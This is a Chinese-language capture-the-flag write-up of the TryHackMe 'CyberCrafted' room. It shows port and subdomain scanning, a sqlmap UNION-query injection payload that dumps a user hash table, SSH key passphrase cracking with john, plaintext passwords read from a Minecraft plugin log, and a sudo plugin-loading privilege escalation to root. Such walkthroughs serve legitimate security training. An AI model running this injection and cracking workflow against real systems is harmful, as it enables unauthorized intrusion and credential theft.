CyberCrafted
端口扫描
root@ip-10-10-157-48:~/cybercrafted# nmap -sTCV -p 22,80,25565 --min-rate 1000 10.10.177.157
Starting Nmap 7.60 ( https://nmap.org ) at 2023-09-22 01:47 BST
Nmap scan report for ip-10-10-177-157.eu-west-1.compute.internal (10.10.177.157)
Host is up (0.00022s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 37:36:ce:b9:ac:72:8a:d7:a6:b7:8e:45:d0:ce:3c:00 (RSA)
| 256 e9:e7:33:8a:77:28:2c:d4:8c:6d:8a:2c:e7:88:95:30 (ECDSA)
|_ 256 76:a2:b1:cf:1b:3d:ce:6c:60:f5:63:24:3e:ef:70:d8 (EdDSA)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to http://cybercrafted.thm/
25565/tcp open minecraft Minecraft 1.7.2 (Protocol: 127, Message: ck00r lcCyberCraftedr ck00rrck00r e-TryHackMe-r ck00r, Users: 0/1)
MAC Address: 02:F3:76:CB:78:1D (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.24 seconds
80
因为在进行端口扫描时告诉我一个域名: http://cybercrafted.thm/, 所以我直接开始子域扫描
root@ip-10-10-157-48:~/cybercrafted# gobuster vhost -u http://cybercrafted.thm/ -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://cybercrafted.thm/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2023/09/22 01:49:04 Starting gobuster
===============================================================
Found: admin.cybercrafted.thm (Status: 200) [Size: 937]
Found: store.cybercrafted.thm (Status: 403) [Size: 287]
在这里我们发现了两个子域, 当然我们还是要回到我们的主站进行观看的, 当你查看主站源代码你会发现其中有一条提示告诉我们添加了子域,虽然这时候基本攻击点就是子域了但是我们还是要进行目录的扫描, 我就全部扫描了,
root@ip-10-10-157-48:~/cybercrafted# gobuster dir -u http://cybercrafted.thm/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://cybercrafted.thm/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,html,php
[+] Timeout: 10s
===============================================================
2023/09/22 01:51:11 Starting gobuster
===============================================================
/index.html (Status: 200)
/assets (Status: 301)
/secret (Status: 301)
/server-status (Status: 403)
===============================================================
2023/09/22 01:54:11 Finished
===============================================================
root@ip-10-10-157-48:~/cybercrafted# gobuster dir -u http://admin.cybercrafted.thm/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://admin.cybercrafted.thm/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
2023/09/22 01:54:29 Starting gobuster
===============================================================
/index.php (Status: 200)
/login.php (Status: 302)
/assets (Status: 301)
/panel.php (Status: 302)
/server-status (Status: 403)
===============================================================
2023/09/22 02:00:09 Finished
===============================================================
root@ip-10-10-157-48:~/cybercrafted# gobuster dir -u http://store.cybercrafted.thm/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://store.cybercrafted.thm/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: html,php,txt
[+] Timeout: 10s
===============================================================
2023/09/22 02:07:25 Starting gobuster
===============================================================
/index.html (Status: 403)
/search.php (Status: 200)
/assets (Status: 301)
/server-status (Status: 403)
对于上面的结果来看:
- 主站 : 估计没东西了, 唯一可能的 secret 就是几个照片我还怀疑是文件隐写但是想多了
- admin 子域 : 一个登陆站点, 估计是要拿到登陆密码之类的内容, 尝试 sql 注入无果
- store 子域 : 有一个搜索界面可能存在 sql 注入漏洞下面我就进行了尝试 (过多内容我就不展示了, 最后我们可以获取到一个登陆数据库)
root@ip-10-10-157-48:~/cybercrafted# sqlmap -r sql_store.txt --dbms=mysql
---
Parameter: search (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: search=12' UNION ALL SELECT NULL,NULL,CONCAT(0x71786a7a71,0x75634f65566e5058566d4144785952757a58785a597963447252757a4b48457256467966696c4450,0x716a707a71),NULL-- tzLV&submit=
---
+----+------------------------------------------+---------------------+
| id | hash | user |
+----+------------------------------------------+---------------------+
| 1 | 88b949dd5cdfbecb9f2ecbbfa24e5974234e7c01 | xXUltimateCreeperXx |
| 4 | THM{bbe315906038c3a62d9b195001f75008} | web_flag |
+----+------------------------------------------+---------------------+
对于上面得到的密码我们可以进行解密
之后登陆我们的 admin 子域发现进入一个 panel.php 界面这是一个命令执行页面
后渗透
www-data
利用上面得到的命令执行窗口获取 Shell
www-data —> xxultimatecreeperxx
我发现对于 xxultimatecreeperxx 用户我们可以读取其 ssh 的私钥
(remote) www-data@cybercrafted:/home/xxultimatecreeperxx/.ssh$ ls -al
total 16
drwxrwxr-x 2 xxultimatecreeperxx xxultimatecreeperxx 4096 Jun 27 2021 .
drwxr-xr-x 5 xxultimatecreeperxx xxultimatecreeperxx 4096 Oct 15 2021 ..
-rw-r--r-- 1 xxultimatecreeperxx xxultimatecreeperxx 414 Jun 27 2021 authorized_keys
-rw-r--r-- 1 xxultimatecreeperxx xxultimatecreeperxx 1766 Jun 27 2021 id_rsa
经过验证存在密码, 所以我使用 john 进行了密码的破解
root@ip-10-10-157-48:~/cybercrafted# john hash.txt --wordlist=`locate rockyou.txt`
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
creepin2006 (id_rsa)
1g 0:00:00:22 DONE (2023-09-22 02:19) 0.04415g/s 633187p/s 633187c/s 633187C/s *7¡Vamos!
Session completed.
然后进行登陆即可
xxultimatecreeperxx —> cybercrafted
我发现用户是属于一个组的, 所以我直接查找属于这个组的文件
xxultimatecreeperxx@cybercrafted:~$ find / -group 25565 2>/dev/null
/opt/minecraft
/opt/minecraft/note.txt
........
/opt/minecraft/cybercrafted/plugins
/opt/minecraft/cybercrafted/plugins/LoginSystem_v.2.4.jar
/opt/minecraft/cybercrafted/plugins/LoginSystem
/opt/minecraft/cybercrafted/plugins/LoginSystem/settings.yml
/opt/minecraft/cybercrafted/plugins/LoginSystem/passwords.yml
/opt/minecraft/cybercrafted/plugins/LoginSystem/log.txt
/opt/minecraft/cybercrafted/plugins/LoginSystem/language.yml
查看这个 note.txt 文件我知道了提供了一个 Minecraft 插件, 并且我们可以从上面的输出中看到这个插件并且其名称为 login 所以应该和登陆有关我们进行查看
xxultimatecreeperxx@cybercrafted:/opt/minecraft/cybercrafted/plugins/LoginSystem$ cat passwords.yml
cybercrafted: dcbf543ee264e2d3a32c967d663e979e
madrinch: 42f749ade7f9e195bf475f37a44cafcb
xxultimatecreeperxx@cybercrafted:/opt/minecraft/cybercrafted/plugins/LoginSystem$ cat log.txt
[2021/06/27 11:25:07] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:25:16] cybercrafted registered. PW: JavaEdition>Bedrock
[2021/06/27 11:46:30] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:47:34] cybercrafted logged in. PW: JavaEdition>Bedrock
[2021/06/27 11:52:13] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:57:29] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:57:54] cybercrafted logged in. PW: JavaEdition>Bedrock
[2021/06/27 11:58:38] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:58:46] cybercrafted logged in. PW: JavaEdition>Bedrock
[2021/06/27 11:58:52] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:59:01] madrinch logged in. PW: Password123
这里泄露了用户 cybercrafted 的密码, 我们可以尝试利用此进行登陆
cybercrafted —> root
我发现用户具有 sudo 特权, 所以我们可以尝试利用此来进行权限升级
简单查看其功能后, 我意识到我们可能需要找到一个插件并将其加载到服务中, 进行利用, 经过查找我发现了 https://github.com/Frazew/BukkitTTY, 因此将其下载并上传后, 我们需要进行重新加载之后我们的上传的插件才会被加载到我们的程序当中
>plugins # 查看当前插件列表
[01:42:52 INFO]: Plugins (1): LoginSystem
>reload # 重新加载服务器
......
>plugins # 查看插件列表
[01:43:08 INFO]: Plugins (2): **BukkitTTY**, LoginSystem
现在我们输入 help 指令就可以发现我们新上传的命令了
当然也还有最简单的方法, 我们只需要在程序运行后执行 ctrl+a 和 ctrl+c 即可
教训
- 在扫描子域时, 记得关注不同的状态码对应的情况, 并积极进行分析